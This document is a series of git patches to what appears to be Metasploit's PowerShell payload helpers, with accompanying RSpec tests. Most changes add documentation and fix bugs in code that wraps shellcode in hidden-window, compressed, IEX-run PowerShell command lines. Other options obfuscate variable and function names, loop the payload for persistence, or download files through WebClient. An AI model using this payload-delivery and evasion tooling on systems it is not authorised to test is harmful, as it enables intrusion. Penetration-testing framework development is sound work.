+  #   execution (-NoExit)
+  # @option opts [Boolean] :nologo Whether to display the logo (-NoLogo)
+  # @option opts [Boolean] :noninteractive Whether to load a non
+  #   interactive powershell (-NonInteractive)
+  # @option opts [Boolean] :mta Whether to run as Multi-Threaded
+  #   Apartment (-Mta)
+  # @option opts [String] :outputformat The output format
+  #   (-OutputFormat)
+  # @option opts [Boolean] :sta Whether to run as Single-Threaded
+  #   Apartment (-Sta)
+  # @option opts [Boolean] :noprofile Whether to use the current users
+  #   powershell profile (-NoProfile)
+  # @option opts [String] :windowstyle The window style to use
+  #   (-WindowStyle)
+  #
+  # @return [String] Powershell command arguments
   def generate_psh_args(opts)
     return "" unless opts
 
@@ -189,10 +239,15 @@ module Exploit::Powershell
   end
 
   #
-  # Runs powershell in hidden window raising interactive proc msg
-  # Detect the architecture
+  # Wraps the powershell code to launch a hidden window and
+  # detect the execution environment and spawn the appropriate
+  # powershell executable for the payload architecture.
   #
-
+  # @param ps_code [String] Powershell code
+  # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
+  # @param encoded [Boolean] Indicates whether ps_code is encoded or not
+  #
+  # @return [String] Wrapped powershell code 
   def run_hidden_psh(ps_code, payload_arch, encoded)
     arg_opts = {
         :noprofile => true,
@@ -233,8 +288,30 @@ EOS
   end
 
   #
-  # Creates cmd script to execute psh payload
+  # Creates a powershell command line string which will execute the
+  # payload in a hidden window in the appropriate execution environment
+  # for the payload architecture. Opts are passed through to
+  # run_hidden_psh, generate_psh_command_line and generate_psh_args
   #
+  # @param pay [String] The payload shellcode
+  # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
+  # @param opts [Hash] The options to generate the command
+  # @option opts [Boolean] :persist Loop the payload to cause
+  #   re-execution if the shellcode finishes
+  # @option opts [Integer] :prepend_sleep Sleep for the specified time
+  #   before executing the payload
+  # @option opts [String] :method The powershell injection technique to
+  #   use: 'net'/'reflection'/'old'
+  # @option opts [Boolean] :encode_inner_payload Encodes the powershell
+  #   script within the hidden/architecture detection wrapper
+  # @option opts [Boolean] :encode_final_payload Encodes the final
+  #   powershell script
+  # @option opts [Boolean] :remove_comspec Removes the %COMSPEC%
+  #   environment variable at the start of the command line
+  # @option opts [Boolean] :use_single_quotes Wraps the -Command
+  #   argument in single quotes unless :encode_final_payload
+  #
+  # @return [String] Powershell command line with payload
   def cmd_psh_payload(pay, payload_arch, opts={})
     opts[:persist] ||= datastore['Powershell::persist']
     opts[:prepend_sleep] ||= datastore['Powershell::prepend_sleep']

From 647936e291148914af70a56a3ec929c65029e153 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 01:07:54 +0100
Subject: [PATCH 086/321] Add more yarddoc to Rex::Exploitation::Powershell

encode_code doesn't use eof
no need to unicode encode in gzip as this is handled by encode_code
---
 lib/msf/core/exploit/powershell.rb |  2 +-
 lib/rex/exploitation/powershell.rb | 80 ++++++++++++++++++++++++++----
 2 files changed, 72 insertions(+), 10 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 1df7a59817..a510849fd7 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -89,7 +89,7 @@ module Exploit::Powershell
       psh.send(mod_method)
     end
 
-    psh.encode_code(eof)
+    psh.encode_code
   end
 
   #
diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index 8c3229e935..fc1e0b1dca 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -10,10 +10,18 @@ module Powershell
 
   module Output
 
+    #
+    # To String
+    #
+    # @return [String] Code
     def to_s
       code
     end
 
+    #
+    # Returns code size
+    #
+    # @return [Integer] Code size
     def size
       code.size
     end
@@ -21,6 +29,7 @@ module Powershell
     #
     # Return code with numbered lines
     #
+    # @return [String] Powershell code with line numbers
     def to_s_lineno
       numbered = ''
       code.split(/\r\n|\n/).each_with_index do |line,idx|
@@ -30,8 +39,12 @@ module Powershell
     end
 
     #
-    # Return a zlib compressed powershell code
+    # Return a zlib compressed powershell code wrapped in decode stub
     #
+    # @param eof [String] End of file identifier to append to code
+    #
+    # @return [String] Zlib compressed powershell code wrapped in
+    # decompression stub
     def deflate_code(eof = nil)
       # Compress using the Deflate algorithm
       compressed_stream = ::Zlib::Deflate.deflate(code,
@@ -65,14 +78,18 @@ module Powershell
     #
     # Return Base64 encoded powershell code
     #
-    def encode_code(eof = nil)
+    # @return [String] Base64 encoded powershell code
+    def encode_code
       @code = Rex::Text.encode_base64(Rex::Text.to_unicode(code))
     end
 
-
     #
-    # Return a gzip compressed powershell code
+    # Return a gzip compressed powershell code wrapped in decoder stub
     #
+    # @param eof [String] End of file identifier to append to code
+    #
+    # @return [String] Gzip compressed powershell code wrapped in
+    # decompression stub
     def gzip_code(eof = nil)
       # Compress using the Deflate algorithm
       compressed_stream = Rex::Text.gzip(code)
@@ -96,15 +113,18 @@ module Powershell
       #if (eof && eof.length == 8) then psh_expression += "'#{eof}'" end
       psh_expression << "echo '#{eof}';" if eof
 
-      # Convert expression to unicode
-      unicode_expression = Rex::Text.to_unicode(psh_expression)
-
       @code = psh_expression
     end
 
     #
-    # Compresses script contents with gzip or deflate
+    # Compresses script contents with gzip (default) or deflate
     #
+    # @param eof [String] End of file identifier to append to code
+    # @param gzip [Boolean] Whether to use gzip compression or deflate
+    # @parma in_place [Boolean] Whether to update the current script
+    #   code or just return the output.
+    #
+    # @return [String] Compressed code wrapped in decompression stub
     def compress_code(eof = nil, gzip = true, in_place = true)
       code = gzip ? gzip_code(eof) : deflate_code(eof)
       @code = code if in_place
@@ -115,9 +135,9 @@ module Powershell
     # Reverse the compression process
     # Try gzip, inflate if that fails
     #
+    # @return [String] Decompressed powershell code
     def decompress_code
       # Decode base64 and convert to ascii
-      raw = Rex::Text.decode_base64(code)
       ascii_expression = Rex::Text.to_ascii(raw)
       # Extract substring with payload
       encoded_stream = ascii_expression.scan(/FromBase64String\('(.*)'/).flatten.first
@@ -355,6 +375,10 @@ module Powershell
       @name = name.strip.gsub(/\s|,/,'')
     end
 
+    #
+    # To String
+    #
+    # @return [String] Powershell param
     def to_s
       "[#{klass}]$#{name}"
     end
@@ -373,10 +397,18 @@ module Powershell
       populate_params
     end
 
+    #
+    # To String
+    #
+    # @return [String] Powershell function
     def to_s
       "function #{name} #{code}"
     end
 
+    #
+    # Identify the parameters from the code and 
+    # store as Param in @params
+    #
     def populate_params
       @params = []
       start = code.index(/param\s+\(|param\(/im)
@@ -446,6 +478,11 @@ module Powershell
     #
     # Convert binary to byte array, read from file if able
     #
+    # @param input_data [String] Path to powershell file or powershell
+    #   code string
+    # @param var_name [String] Byte array variable name
+    #
+    # @return [String] input_data as a powershell byte array
     def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
       code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
       code = code.unpack('C*')
@@ -462,6 +499,10 @@ module Powershell
       return psh << lines.join("") + "\r\n"
     end
 
+    #
+    # ?? RageLtMan
+    #
+    # @param dir [String] ?
     def self.psp_funcs(dir)
       scripts = Dir.glob(File.expand_path(dir) + '/**/*').select {|e| e =~ /ps1$|psm1$/}
       functions = scripts.map {|s| puts s; Script.new(s).functions}
@@ -471,6 +512,7 @@ module Powershell
     #
     # Return list of code modifier methods
     #
+    # @return [Array] Code modifiers
     def self.code_modifiers
       self.instance_methods.select {|m| m =~ /^(strip|sub)/}
     end
@@ -485,6 +527,10 @@ module Powershell
     #
     # Download file via .NET WebClient
     #
+    # @param src [String] URL to the file
+    # @param target [String] Location to save the file
+    #
+    # @return [String] Powershell code to download a file
     def self.download(src,target=nil)
       target ||= '$pwd\\' << src.split('/').last
       return %Q^(new-object System.Net.WebClient).Downloadfile("#{src}", "#{target}")^
@@ -493,6 +539,11 @@ module Powershell
     #
     # Uninstall app, or anything named like app
     #
+    # @param app [String] Name of application
+    # @param fuzzy [Boolean] Whether to apply a fuzzy match (-like) to
+    #   the application name
+    #
+    # @return [String] Powershell code to uninstall an application
     def self.uninstall(app,fuzzy=true)
       match = fuzzy ? '-like' : '-eq'
       return %Q^$app = Get-WmiObject -Class Win32_Product | Where-Object { $_.Name #{match} "#{app}" }; $app.Uninstall()^
@@ -501,6 +552,9 @@ module Powershell
     #
     # Create secure string from plaintext
     #
+    # @param str [String] String to create as a SecureString
+    #
+    # @return [String] Powershell code to create a SecureString
     def self.secure_string(str)
       return %Q^ConvertTo-SecureString -string '#{str}' -AsPlainText -Force$^
     end
@@ -508,6 +562,10 @@ module Powershell
     #
     # Find PID of file lock owner
     #
+    # @param filename [String] Filename
+    #
+    # @return [String] Powershell code to identify the PID of a file
+    #   lock owner
     def self.who_locked_file?(filename)
       return %Q^ Get-Process | foreach{$processVar = $_;$_.Modules | foreach{if($_.FileName -eq "#{filename}"){$processVar.Name + " PID:" + $processVar.id}}}^
     end
@@ -515,6 +573,10 @@ module Powershell
     #
     # Return last time of login
     #
+    # @param user [String] Username
+    #
+    # @return [String] Powershell code to return the last time of a user
+    #   login
     def self.get_last_login(user)
       return %Q^ Get-QADComputer -ComputerRole DomainController | foreach { (Get-QADUser -Service $_.Name -SamAccountName "#{user}").LastLogon} | Measure-Latest^
     end

From dd38a81dfc6409dfc7cc258e01460cd58ad45013 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 01:10:13 +0100
Subject: [PATCH 087/321] Fix a @parma

---
 lib/rex/exploitation/powershell.rb | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index fc1e0b1dca..93aa0ef916 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -121,7 +121,7 @@ module Powershell
     #
     # @param eof [String] End of file identifier to append to code
     # @param gzip [Boolean] Whether to use gzip compression or deflate
-    # @parma in_place [Boolean] Whether to update the current script
+    # @param in_place [Boolean] Whether to update the current script
     #   code or just return the output.
     #
     # @return [String] Compressed code wrapped in decompression stub

From d2e8e07cfea406d1c89fc2f5be25bf573005acc4 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 01:58:02 +0100
Subject: [PATCH 088/321] Fix old powershell generation

---
 lib/rex/exploitation/powershell.rb | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index 93aa0ef916..cc20f64b08 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -484,7 +484,13 @@ module Powershell
     #
     # @return [String] input_data as a powershell byte array
     def self.to_byte_array(input_data,var_name = Rex::Text.rand_text_alpha(rand(3)+3))
-      code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      # File will raise an exception if the path contains null byte
+      if input_data.include? "\x00"
+        code = input_data
+      else
+        code = ::File.file?(input_data) ? ::File.read(input_data) : input_data
+      end
+
       code = code.unpack('C*')
       psh = "[Byte[]] $#{var_name} = 0x#{code[0].to_s(16)}"
       lines = []

From e774411b63768796d63050b7c6254433399c1d55 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 02:06:14 +0100
Subject: [PATCH 089/321] Revert Enum removal

.NET 4.5 has two constructors with 2 args so this becomes ambiguous
---
 lib/rex/exploitation/powershell.rb | 6 ++----
 1 file changed, 2 insertions(+), 4 deletions(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index cc20f64b08..0a18c65b1d 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -64,8 +64,7 @@ module Powershell
       psh_expression << "IEX (New-Object IO.StreamReader("
       psh_expression << "New-Object IO.Compression.DeflateStream("
       psh_expression << "$s,"
-      # [IO.Compression.CompressionMode]::Decompress = 0
-      psh_expression << "0)"
+      psh_expression << "[IO.Compression.CompressionMode]::Decompress)"
       psh_expression << ")).ReadToEnd();"
 
       # If eof is set, add a marker to signify end of code output
@@ -105,8 +104,7 @@ module Powershell
       psh_expression << "IEX (New-Object IO.StreamReader("
       psh_expression << "New-Object IO.Compression.GzipStream("
       psh_expression << "$s,"
-      # [IO.Compression.CompressionMode]::Decompress = 0
-      psh_expression << "0)"
+      psh_expression << "[IO.Compression.CompressionMode]::Decompress)"
       psh_expression << ")).ReadToEnd();"
 
       # If eof is set, add a marker to signify end of code output

From 01bfad34897d8fcd39ce574a155cbeb414452c08 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 02:08:57 +0100
Subject: [PATCH 090/321] Correct datastore values

---
 lib/msf/core/exploit/powershell.rb | 7 ++++---
 1 file changed, 4 insertions(+), 3 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index a510849fd7..f60f688899 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -84,7 +84,7 @@ module Exploit::Powershell
     # Build script object
     psh = PowershellScript.new(script_in)
     # Invoke enabled modifiers
-    datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
+    datastore.select {|k,v| k =~ /^Powershell::(strip|sub)/ and v == 'true' }.keys.map do |k|
       mod_method = k.split('::').last.intern
       psh.send(mod_method)
     end
@@ -104,7 +104,7 @@ module Exploit::Powershell
     # Build script object
     psh = PowershellScript.new(script_in)
     # Invoke enabled modifiers
-    datastore.select {|k,v| k =~ /^PSH::(strip|sub)/ and v == 'true' }.keys.map do |k|
+    datastore.select {|k,v| k =~ /^Powershell::(strip|sub)/ and v == 'true' }.keys.map do |k|
       mod_method = k.split('::').last.intern
       psh.send(mod_method)
     end
@@ -261,7 +261,8 @@ module Exploit::Powershell
     end
 
     # Old technique fails if powershell exits..
-    arg_opts[:noexit] = true if datastore['PSH::method'] == 'old'
+    arg_opts[:noexit] = true if datastore['Powershell::method'] == 'old'
+    puts arg_opts.inspect
 
     ps_args = generate_psh_args(arg_opts)
 

From 1347649a47309ee34aaf33bd11c9b4dc05d9552d Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 02:37:07 +0100
Subject: [PATCH 091/321] Remove unused EOFs

---
 lib/msf/core/exploit/powershell.rb | 3 +--
 1 file changed, 1 insertion(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index f60f688899..1bc835d304 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -77,10 +77,9 @@ module Exploit::Powershell
   # Will invoke PSH modifiers as enabled
   #
   # @param script_in [String] Script contents
-  # @param eof [String] Marker to indicate the end of file appended to script
   #
   # @return [String] Encoded script
-  def encode_script(script_in, eof = nil)
+  def encode_script(script_in)
     # Build script object
     psh = PowershellScript.new(script_in)
     # Invoke enabled modifiers

From c4cfa42e5b801fa7960cdef9c565efa0fdabd98e Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 02:37:19 +0100
Subject: [PATCH 092/321] More specs

---
 spec/lib/msf/core/exploit/powershell.rb | 25 +++++++++++++++++++++++++
 1 file changed, 25 insertions(+)

diff --git a/spec/lib/msf/core/exploit/powershell.rb b/spec/lib/msf/core/exploit/powershell.rb
index 34da695706..5ceba1813c 100644
--- a/spec/lib/msf/core/exploit/powershell.rb
+++ b/spec/lib/msf/core/exploit/powershell.rb
@@ -4,6 +4,8 @@ require 'spec_helper'
 require 'msf/core'
 require 'msf/core/exploit/powershell'
 
+EXAMPLE_PATH = File.join(Msf::Config.data_directory, "exploits", "powershell", "powerdump.ps1")
+
 describe Msf::Exploit::Powershell do
   let(:datastore) { { } }
   subject do
@@ -16,6 +18,29 @@ describe Msf::Exploit::Powershell do
     mod
   end
 
+  describe "::read_script" do
+    it 'should read a sample script file' do
+      script = subject.read_script(EXAMPLE_PATH)
+      script.should be_kind_of(Rex::Exploitation::Powershell::Script)
+    end
+  end
+
+  describe "::encode_script" do
+    it 'should read and encode a sample script file' do
+      script = subject.encode_script(EXAMPLE_PATH)
+      script.should be
+      script.length.should be > 0
+    end
+  end
+
+  describe "::compress_script" do
+    it 'should create a compress script' do
+      script = File.read(EXAMPLE_PATH)
+      compressed = subject.compress_script(script)
+      compressed.length.should be < script.length
+    end
+  end
+
   describe "::generate_psh_command_line" do
     it 'should contain no full stop when :no_full_stop' do
       opts = {:no_full_stop => true}

From 11526b59a6fbee358e79f73e03005049031a1153 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 05:03:16 +0100
Subject: [PATCH 093/321] Boolean datastore options should always be present

Dont evaluate true/false as 'true'/'false'!
---
 lib/msf/core/exploit/powershell.rb | 12 ++++++------
 1 file changed, 6 insertions(+), 6 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 1bc835d304..b0bf05ca71 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -12,10 +12,10 @@ module Exploit::Powershell
       [
         OptBool.new('Powershell::persist', [true, 'Run the payload in a loop', false]),
         OptBool.new('Powershell::prepend_sleep', [false, 'Prepend seconds of sleep']),
-        OptBool.new('Powershell::strip_comments', [false, 'Strip comments', true]),
-        OptBool.new('Powershell::strip_whitespace', [false, 'Strip whitespace', false]),
-        OptBool.new('Powershell::sub_vars', [false, 'Substitute variable names', false]),
-        OptBool.new('Powershell::sub_funcs', [false, 'Substitute function names', false]),
+        OptBool.new('Powershell::strip_comments', [true, 'Strip comments', true]),
+        OptBool.new('Powershell::strip_whitespace', [true, 'Strip whitespace', false]),
+        OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]),
+        OptBool.new('Powershell::sub_funcs', [true, 'Substitute function names', false]),
         OptEnum.new('Powershell::method', [true, 'Payload delivery method', 'reflection', [
           'net',
           'reflection',
@@ -83,7 +83,7 @@ module Exploit::Powershell
     # Build script object
     psh = PowershellScript.new(script_in)
     # Invoke enabled modifiers
-    datastore.select {|k,v| k =~ /^Powershell::(strip|sub)/ and v == 'true' }.keys.map do |k|
+    datastore.select {|k,v| k =~ /^Powershell::(strip|sub)/ and v}.keys.map do |k|
       mod_method = k.split('::').last.intern
       psh.send(mod_method)
     end
@@ -103,7 +103,7 @@ module Exploit::Powershell
     # Build script object
     psh = PowershellScript.new(script_in)
     # Invoke enabled modifiers
-    datastore.select {|k,v| k =~ /^Powershell::(strip|sub)/ and v == 'true' }.keys.map do |k|
+    datastore.select {|k,v| k =~ /^Powershell::(strip|sub)/ and v}.keys.map do |k|
       mod_method = k.split('::').last.intern
       psh.send(mod_method)
     end

From 32fa8748a83e2cd2fd3a3a3f2261e8c994bf721e Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 05:20:54 +0100
Subject: [PATCH 094/321] Fix up decompress

---
 lib/rex/exploitation/powershell.rb | 4 +---
 1 file changed, 1 insertion(+), 3 deletions(-)

diff --git a/lib/rex/exploitation/powershell.rb b/lib/rex/exploitation/powershell.rb
index 0a18c65b1d..63cf8be0f6 100644
--- a/lib/rex/exploitation/powershell.rb
+++ b/lib/rex/exploitation/powershell.rb
@@ -135,10 +135,8 @@ module Powershell
     #
     # @return [String] Decompressed powershell code
     def decompress_code
-      # Decode base64 and convert to ascii
-      ascii_expression = Rex::Text.to_ascii(raw)
       # Extract substring with payload
-      encoded_stream = ascii_expression.scan(/FromBase64String\('(.*)'/).flatten.first
+      encoded_stream = @code.scan(/FromBase64String\('(.*)'/).flatten.first
       # Decode and decompress the string
       @code = ( Rex::Text.ungzip( Rex::Text.decode_base64(encoded_stream) ) ||
         Rex::Text.zlib_inflate( Rex::Text.decode_base64(encoded_stream)) )

From 58c3bf0e5999b8b4b09556316986fdb35fac9c1f Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 06:08:39 +0100
Subject: [PATCH 095/321] Further speccage

---
 spec/lib/msf/core/exploit/powershell.rb | 196 ++++++++++++++++++++++--
 1 file changed, 183 insertions(+), 13 deletions(-)

diff --git a/spec/lib/msf/core/exploit/powershell.rb b/spec/lib/msf/core/exploit/powershell.rb
index 5ceba1813c..7c671dd849 100644
--- a/spec/lib/msf/core/exploit/powershell.rb
+++ b/spec/lib/msf/core/exploit/powershell.rb
@@ -4,40 +4,210 @@ require 'spec_helper'
 require 'msf/core'
 require 'msf/core/exploit/powershell'
 
-EXAMPLE_PATH = File.join(Msf::Config.data_directory, "exploits", "powershell", "powerdump.ps1")
+def decompress(code)
+  Rex::Exploitation::Powershell::Script.new(code).decompress_code
+end
 
 describe Msf::Exploit::Powershell do
-  let(:datastore) { { } }
   subject do
-    mod = Module.new
+    mod = Msf::Exploit.allocate
     mod.extend described_class
-    mod.stub(
-      :datastore => datastore
-    )
-
+    mod.send(:initialize, {})
     mod
   end
 
+  let(:example_script) do
+    File.join(Msf::Config.data_directory, "exploits", "powershell", "powerdump.ps1")
+  end
+
   describe "::read_script" do
     it 'should read a sample script file' do
-      script = subject.read_script(EXAMPLE_PATH)
+      script = subject.read_script(example_script)
       script.should be_kind_of(Rex::Exploitation::Powershell::Script)
     end
   end
 
   describe "::encode_script" do
     it 'should read and encode a sample script file' do
-      script = subject.encode_script(EXAMPLE_PATH)
+      script = subject.encode_script(example_script)
       script.should be
       script.length.should be > 0
     end
   end
 
   describe "::compress_script" do
-    it 'should create a compress script' do
-      script = File.read(EXAMPLE_PATH)
-      compressed = subject.compress_script(script)
-      compressed.length.should be < script.length
+    context 'when default datastore is set' do
+      it 'should create a compressed script' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        compressed.length.should be < script.length
+        compressed.include?('IO.Compression').should be_true
+      end
+
+      it 'should create a compressed script with eof' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script, 'end_of_file')
+        compressed.length.should be < script.length
+      end
+    end
+
+    context 'when strip_comments is true' do
+      before do
+        subject.datastore['Powershell::strip_comments'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should strip comments' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        compressed.length.should be < script.length
+      end
+    end
+    context 'when strip_comment is false' do
+      before do
+        subject.datastore['Powershell::strip_comments'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt strip comments' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        compressed.length.should be < script.length
+      end
+    end
+
+    context 'when strip_whitespace is true' do
+      before do
+        subject.datastore['Powershell::strip_whitespace'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should strip whitespace' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).length.should be < script.length
+      end
+    end
+
+    context 'when strip_whitespace is false' do
+      before do
+        subject.datastore['Powershell::strip_whitespace'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt strip whitespace' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).length.should be script.length
+      end
+    end
+
+    context 'when sub_vars is true' do
+      before do
+        subject.datastore['Powershell::sub_vars'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should substitute variables' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).include?('$hashes').should be_false
+      end
+    end
+
+    context 'when sub_vars is false' do
+      before do
+        subject.datastore['Powershell::sub_vars'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt substitute variables' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).include?('$hashes').should be_true
+      end
+    end
+
+    context 'when sub_funcs is true' do
+      before do
+        subject.datastore['Powershell::sub_funcs'] = true
+        subject.options.validate(subject.datastore)
+      end
+      it 'should substitute functions' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).include?('DumpHashes').should be_false
+      end
+    end
+
+    context 'when sub_funcs is false' do
+      before do
+        subject.datastore['Powershell::sub_funcs'] = false
+        subject.options.validate(subject.datastore)
+      end
+      it 'shouldnt substitute variables' do
+        script = File.read(example_script)
+        compressed = subject.compress_script(script)
+        decompress(compressed).include?('DumpHashes').should be_true
+      end
+    end
+  end
+
+  describe "::cmd_psh_payload" do
+    it 'should generate a command line with an x86 payload' do
+
+    end
+
+    it 'should generate a command line with an x64 payload' do
+
+    end
+
+    context 'when persist is true' do
+      it 'should add a persistance loop'
+      end
+    end
+
+    context 'when persist is false' do
+      it 'shouldnt add a persistance loop' do
+      end
+    end
+
+    context 'when prepend_sleep is set' do
+      it 'should add a sleep' do
+
+      end
+    end
+
+    context 'when prepend_sleep isnt set' do
+      it 'shouldnt add a sleep' do
+
+      end
+    end
+
+    context 'when method is old' do
+
+    end
+
+    context 'when method is net' do
+
+    end
+
+    context 'when method is reflection' do
+
+    end
+
+    context 'when method is msil' do
+
+    end
+
+    context 'when encode_inner_payload' do
+
+    end
+
+    context 'when encode_final_payload' do
+
+    end
+
+    context 'when remove_comspec' do
+
+    end
+
+    context 'when use single quotes' do
+
     end
   end
 

From 61b8fb7921078e88c082a2ac3dd304f0b6dd01c8 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 06:15:28 +0100
Subject: [PATCH 096/321] Remove puts

---
 lib/msf/core/exploit/powershell.rb | 1 -
 1 file changed, 1 deletion(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index b0bf05ca71..4699c6239e 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -261,7 +261,6 @@ module Exploit::Powershell
 
     # Old technique fails if powershell exits..
     arg_opts[:noexit] = true if datastore['Powershell::method'] == 'old'
-    puts arg_opts.inspect
 
     ps_args = generate_psh_args(arg_opts)
 

From 0137fdb690a154edd2085497e5b313cf63ee1e72 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 07:29:51 +0100
Subject: [PATCH 097/321] Prepend sleep should be an int

---
 lib/msf/core/exploit/powershell.rb | 4 ++--
 1 file changed, 2 insertions(+), 2 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 4699c6239e..394ef36a07 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -11,7 +11,7 @@ module Exploit::Powershell
     register_advanced_options(
       [
         OptBool.new('Powershell::persist', [true, 'Run the payload in a loop', false]),
-        OptBool.new('Powershell::prepend_sleep', [false, 'Prepend seconds of sleep']),
+        OptInt.new('Powershell::prepend_sleep', [false, 'Prepend seconds of sleep']),
         OptBool.new('Powershell::strip_comments', [true, 'Strip comments', true]),
         OptBool.new('Powershell::strip_whitespace', [true, 'Strip whitespace', false]),
         OptBool.new('Powershell::sub_vars', [true, 'Substitute variable names', false]),
@@ -246,7 +246,7 @@ module Exploit::Powershell
   # @param payload_arch [String] The payload architecture 'x86'/'x86_64'
   # @param encoded [Boolean] Indicates whether ps_code is encoded or not
   #
-  # @return [String] Wrapped powershell code 
+  # @return [String] Wrapped powershell code
   def run_hidden_psh(ps_code, payload_arch, encoded)
     arg_opts = {
         :noprofile => true,

From 72a2849bf153696c5c9fd8b3fc3b0ab952c13198 Mon Sep 17 00:00:00 2001
From: Meatballs <eat_meatballs@hotmail.co.uk>
Date: Wed, 23 Apr 2014 08:07:42 +0100
Subject: [PATCH 098/321] Better specs

90.6% line coverage in Exploit::Powershell
77.32% in Rex::Exploitation::Powershell and haven't even started
writing those specs...
---
 lib/msf/core/exploit/powershell.rb      |   1 +
 spec/lib/msf/core/exploit/powershell.rb | 215 ++++++++++++++++++++++--
 2 files changed, 203 insertions(+), 13 deletions(-)

diff --git a/lib/msf/core/exploit/powershell.rb b/lib/msf/core/exploit/powershell.rb
index 394ef36a07..4a53cd4596 100644
--- a/lib/msf/core/exploit/powershell.rb
+++ b/lib/msf/core/exploit/powershell.rb
@@ -357,6 +357,7 @@ EOS
     compressed_payload = compress_script(psh_payload)
     encoded_payload = encode_script(psh_payload)
 
+    # This branch is probably never taken...
     if encoded_payload.length <= compressed_payload.length
       smallest_payload = encoded_payload
       encoded = true
diff --git a/spec/lib/msf/core/exploit/powershell.rb b/spec/lib/msf/core/exploit/powershell.rb
index 7c671dd849..c02f3c72a4 100644
--- a/spec/lib/msf/core/exploit/powershell.rb
+++ b/spec/lib/msf/core/exploit/powershell.rb
@@ -13,6 +13,7 @@ describe Msf::Exploit::Powershell do
     mod = Msf::Exploit.allocate
     mod.extend described_class
     mod.send(:initialize, {})
+    mod.datastore['Verbose'] = true
     mod
   end
 
@@ -20,6 +21,14 @@ describe Msf::Exploit::Powershell do
     File.join(Msf::Config.data_directory, "exploits", "powershell", "powerdump.ps1")
   end
 
+  let(:payload) do
+    Rex::Text.rand_text_alpha(120)
+  end
+
+  let(:arch) do
+    'x86'
+  end
+
   describe "::read_script" do
     it 'should read a sample script file' do
       script = subject.read_script(example_script)
